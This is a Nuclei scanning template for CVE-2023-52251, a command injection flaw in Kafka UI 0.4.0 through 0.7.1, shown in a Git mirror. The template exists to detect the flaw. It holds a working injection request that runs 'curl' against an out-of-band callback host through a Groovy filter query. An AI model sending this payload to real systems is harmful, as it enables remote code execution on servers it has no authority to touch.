daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-52251.yaml

72 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2023-52251
info:
name: Kafka UI 0.7.1 Command Injection
author: yhy0,iamnoooob
severity: high
description: |
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
reference:
- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
- https://github.com/BobTheShoplifter/CVE-2023-52251-POC
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-52251
cwe-id: CWE-94
epss-score: 0.03218
epss-percentile: 0.91206
cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
metadata:
verified: true
max-request: 3
vendor: provectus
product: ui
framework: kafka
fofa-query: icon_hash="-1477045616"
tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm
http:
- raw:
- |
GET /api/clusters HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: cluster-name
internal: true
json:
- '.[0].name'
- raw:
- |
GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: topic-name
internal: true
json:
- '.topics[].name'
- raw:
- |
@timeout 20s
GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'Assigning partitions'
# digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink